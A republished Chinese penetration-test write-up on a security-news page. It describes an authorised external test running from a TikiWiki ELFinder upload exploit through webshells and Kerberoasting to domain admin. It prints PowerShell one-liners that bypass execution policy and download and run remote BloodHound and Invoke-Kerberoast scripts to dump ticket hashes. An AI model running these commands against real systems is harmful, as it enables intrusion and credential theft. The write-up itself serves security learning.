您当前的位置:首页 > 电脑百科 > 安全防护 > 网络安全

从一个IP入手到拿下域控的整个过程

时间:2022-10-18 16:32:51  来源:网易号  作者:互联网资讯看板

在一次渗透测试中,客户给了一个 IP 范围,要求执行外部的渗透测试,再尝试 nessus 扫描之后没有发现任何可以利用的点,着着我不得不探查目标 IP 是否部署有 web 服务,从而进一步测试。

反查域名

企业外部提供服务的网站都是通过域名来访问,在得知目标 IP 的情况下,我们是有机会获取到有哪些域名解析到这个 IP 之上,方法有很多,比如一些网站提供的 IP 反查功能,还有一些 DNS 数据库中查询,还有就是通过搜索引擎的语法,这里我是用 bing 的搜索语法来看看这些 IP 上部署了哪些 web 服务。

经过一轮搜索,发现其中一个 IP 部署了一个 wiki 系统,如图:


 

链接中有 tiki 关键词,让我联想到了 TikiWiki CMS,接下来我通过搜索引擎搜索关于 TikiWiki 相关的远程命令执行的漏洞,别说,还真有,问题出在插件 ELFinder 中,恰好目标使用了这个插件:


 

漏洞利用

漏洞利用的 EXP 在 exploit-db 上找到,是 msf 的插件,需要使用 msf 来进行利用,漏洞利用 EXP 地址:

 

https://www.exploit-db.com/exploits/40091

 

该漏洞是一个文件上传漏洞,利用过程如图:


 

但是在实际利用的时候,发现没有成功,报错提示是连接被重置:


 

因为漏洞原理我们是知道的,毕竟 exp 中写得很详细,接下来我们尝试手工复现,构造漏洞利用的数据包,然后提交至服务器,如图:


 

发现上传成功,接下来可以访问 webshell 来控制目标服务器。

权限提升

在使用 php webshell 执行 systeminfo 命令时返回信息中发现,目标服务器在域中(DomAIn 字段有域名):


 

然后查看当前 shell 的权限,使用命令 whoami,发现是 IIS_IUSRS:


 

从这里我们可以知道目标服务器操作系统是 windows,web 服务器是 IIS,使用 asp 的 webshell 会有不同的权限,我尝试上传了一个 aspx 的 webshell,然后查询当前权限,发现是 NT AUTHORITY.NETWORK SERVICE 权限:


 

域信息收集

接下来我是用 BloodHound 来收集域中的相关信息,命令:

 

powershell -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.Githubusercontent.com/incredibleindishell/Windows-AD-environment-related/master/Blood_Hound/bps_in.ps1'); Invoke-BloodHound -CollectionMethod All -CompressData -RemoveCSV

 

将收集到的信息上传至本地的 BloodHound 控制台,发现有很少的用户可以获取域管理员的权限:


 

接下来使用 Invoke-Kerberoast 收集 Kerberos TGS Ticket,命令:

 

powershell -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-Kerberoast -OutputFormat Hashcat | Select-Object -ExpandProperty hash | Out-File -filepath ticket_b0x.txt

 

将获取到的 Ticket 信息使用 hashcat 进行暴力破解,还好在一天后成功获得密码。

建立 HTTP 隧道控制内部服务器

测试时发现,内部比较敏感的机器,比如域控制器,无法建立反向隧道,因为外围防火墙做了出站限制,为了解决这个问题,我是用了 NCC 组织开发的建立 HTTP 隧道的脚本:

 

https://github.com/nccgroup/ABPTTS

 

将 asox 脚本上传至 web 服务器,然后在本地启动,这样我们在本地就可以访问域控制器上的资源:


 

其实 ABPTTS 的功能与 reGeorg 类似,通过主动连接 web 服务器后门来建立 HTTP 虽然,然后就可以将本地的流量通过 web 服务器上的后门转发至内网,从而实现对内部敏感服务器的访问。

后来因为域中 ACL 权限访问控制过于松散,从而获得了域管理员的账号权限,接管了整个域。

总结

本文算是一个比较完整地域渗透过程,很多细节做了精简,但是大体流程还是比较清晰,每一个过程可能有很多可以替代的技术,作为参考,还是很有学习的价值的,能够清理的了解一个完整的从外到内的整个渗透过程。

以上文章来源于信安之路 ,作者lwjs



Tags:域控   点击:()  评论:()
声明:本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,不构成投资建议。投资者据此操作,风险自担。如有任何标注错误或版权侵犯请与我们联系,我们将及时更正、删除。
▌相关推荐
恶意程序 IcedID 来袭,通过 DCSync 攻击窃取AD域控的凭据
在最近的网络安全观察中发现,恶意软件 IcedID 的攻击可以使攻击者在获得初始访问权限后不到 24 小时内破坏目标的AD(Active Directory )域控,在整个攻击过程中,攻击者遵循了侦察...【详细内容】
2023-01-17  Search: 域控  点击:(275)  评论:(0)  加入收藏
从一个IP入手到拿下域控的整个过程
在一次渗透测试中,客户给了一个 IP 范围,要求执行外部的渗透测试,再尝试 nessus 扫描之后没有发现任何可以利用的点,着着我不得不探查目标 IP 是否部署有 web 服务,从而进一步测...【详细内容】
2022-10-18  Search: 域控  点击:(341)  评论:(0)  加入收藏
windows_server的AD域控批量添加用户
1:在office的excel中建立一个表格包含如下内容:姓、名、姓名、用户名、登录密码的5个字段。 2:员工列表创建好后保存文件另存为 .csv后缀名的文件,在“文件”中选择“另存为”选...【详细内容】
2022-09-21  Search: 域控  点击:(2257)  评论:(0)  加入收藏
特斯拉的三个区域控制器(Zonal)配置
我们认真的重新看一下特斯拉在Model 3 到Model Y的区域控制器,从第一代迭代到了第三代。从兼容性的角度来看,这三控制器一直在接口上保持向前的兼容性,但是内部的功能分配确实...【详细内容】
2022-05-07  Search: 域控  点击:(222)  评论:(0)  加入收藏
Windows Server 2016部署域控制器
域控制器是指在“域”模式下,至少有一台服务器负责每一台联入网络的电脑和用户的验证工作,相当于一个单位的门卫一样,称为“域控制器(Domain Controller,简写为DC)域控制器( Dom...【详细内容】
2022-05-07  Search: 域控  点击:(1333)  评论:(0)  加入收藏
拿下域控后,我还是对大佬的操作念念不忘
历来攻防演练中,我都笃信一个道理——吃饱了才有力气干活。所以,在清晨的客户现场,当看到大佬满意地吃完了我带来的煎饺,我知道这一战,我们作为攻击队,基本已经拿下了。...【详细内容】
2022-05-05  Search: 域控  点击:(504)  评论:(0)  加入收藏
域控崩溃了、域服务器坏了,完全不可能启动了,怎么办?
“域控崩溃了、域服务器坏了,完全不可能启动了,怎么办?”管理着域控的IT人员,如果没有这样扪心自问过,那他要么不负责任,要么就是无知无畏。在多年的IT外包服务工作中,笔者碰到过好...【详细内容】
2022-02-24  Search: 域控  点击:(417)  评论:(0)  加入收藏
Windows 域控配置时间同步
此功能是因内网时间与互联网时间不同步,需我们手动指定互联网NTP服务器来同步时间。一般默认情况下,加域客户端同步的是域主机的时间。如果域控的主机时间不准的话,那么域内的...【详细内容】
2021-10-19  Search: 域控  点击:(1225)  评论:(0)  加入收藏
通过AD域控平台统一批量管理公司电脑的桌面
一、说明:最近我们公司流行一种特别强大的风气,走进职场办公区后,给人一种特别不好的影响,就是每个工位上的电脑屏上显示着五花八门的图案、壁纸,于是信息部领导发话了,要求职场办...【详细内容】
2020-12-28  Search: 域控  点击:(775)  评论:(0)  加入收藏
大神告诉你所不知道的域控提权
0x01、前言菜鸡一枚,标题起的可能有点大,只是个人笔记整理的一个合集(所以基本每个例子都会有实例)。所以虽然说是合集,可能都没有囊括到各位大佬会的一半。还请各位大佬轻喷 0x0...【详细内容】
2020-08-13  Search: 域控  点击:(1072)  评论:(0)  加入收藏
▌简易百科推荐
2023年最需要注意的九大安全威胁
2023年又是全球网络安全威胁形势持续严峻,在叠加了地缘政治、经济竞争的因素后,具有政府/组织背景的APT组织屡屡在网络功空间之中兴风作浪,而各种新兴技术的应用也催生了大量的...【详细内容】
2023-12-21    FreeBuf.COM  Tags:安全威胁   点击:(99)  评论:(0)  加入收藏
IP地址攻击与防范措施:维护网络安全的关键
IP地址是互联网通信的基本组成部分,然而,它也成为网络攻击的目标。本文将深入探讨IP地址可能面临的攻击方式,以及如何采取有效的防范措施来维护网络的安全。第一部分:IP地址攻击...【详细内容】
2023-12-19  IP数据云    Tags:IP地址   点击:(133)  评论:(0)  加入收藏
CSRF攻击:一种不可忽视的网络威胁
随着网络技术的飞速发展,网络安全问题日益凸显。其中,CSRF(Cross-siteRequestForgery,跨站请求伪造)攻击成为了一种常见的网络威胁,给企业和个人带来了严重的安全隐患。本文将详细...【详细内容】
2023-12-19  小青爱生活    Tags:CSRF攻击   点击:(122)  评论:(0)  加入收藏
2024年影响安全领域的五大技术趋势
即使对于我们这些在科技行业工作了几十年的人来说,过去12个月的变化速度也是惊人的。我们再次确信,技术创新不仅带来了巨大的机遇,也带来了比我们以前面临的更复杂的挑战,而且没...【详细内容】
2023-12-11    千家网  Tags:安全领域   点击:(146)  评论:(0)  加入收藏
网络安全工程师都要了解的勒索威胁新趋势
Zscaler 安全威胁实验室发布《2023 年全球勒索软件报告》中预测了未来将出现的7个勒索威胁新趋势。一、公共服务设施成为勒索软件攻击的目标增加。市政服务部门、执法部门、...【详细内容】
2023-11-16  网盾网络安全培训中心    Tags:网络安全   点击:(210)  评论:(0)  加入收藏
威胁情报趋势
威胁情报是指对各种威胁的收集、分析和推测,以便提前预防和应对威胁。随着技术的不断发展,威胁情报的趋势也在不断变化。本文将对当前的威胁情报趋势进行深入解析,并展望未来可...【详细内容】
2023-11-08  信安天途    Tags:威胁情报   点击:(209)  评论:(0)  加入收藏
如何防范生成式AI的钓鱼邮件攻击
今年ChatGPT火爆全网,近年来AI人工智能取得了长足的进步,给各行各业带来了革命性的变化。然而,与任何技术一样,总是有人试图利用它来达到恶意目的。如今,黑客正在使用一种名为Wor...【详细内容】
2023-10-26  区块软件开发  今日头条  Tags:钓鱼邮件   点击:(231)  评论:(0)  加入收藏
杭州亚运会大火背后,是网安和黑产的疯狂对抗
10月8日晚,第十九届亚运会在杭州圆满落幕,中国代表团以201枚金牌的佳绩耀居榜首,成为历届亚运会以来金牌数量首次突破200枚的国家。根据亚运会主新闻发言人毛根洪10月7日在杭州...【详细内容】
2023-10-12  互盟数据中心    Tags:网安   点击:(344)  评论:(0)  加入收藏
Web 安全之 HSTS 详解和使用
HSTS(HTTP Strict Transport Security) 是一种网络安全机制,可用于防范网络攻击,例如中间人攻击和 CSRF(Cross-Site Request Forgery)等攻击。本文将详细介绍 HSTS 的工作原理、应...【详细内容】
2023-09-27  路多辛  今日头条  Tags:HSTS   点击:(251)  评论:(0)  加入收藏
如何使用Noir从源代码检测攻击面
关于NoirNoir是一款功能强大的代码安全检测工具,在该工具的帮助下,广大研究人员能够轻松从源代码层面检测目标应用程序的潜在攻击面。功能介绍1、从源代码自动识别编程语言和...【详细内容】
2023-09-27    FreeBuf.COM  Tags:Noir   点击:(373)  评论:(0)  加入收藏
站内最新
站内热门
站内头条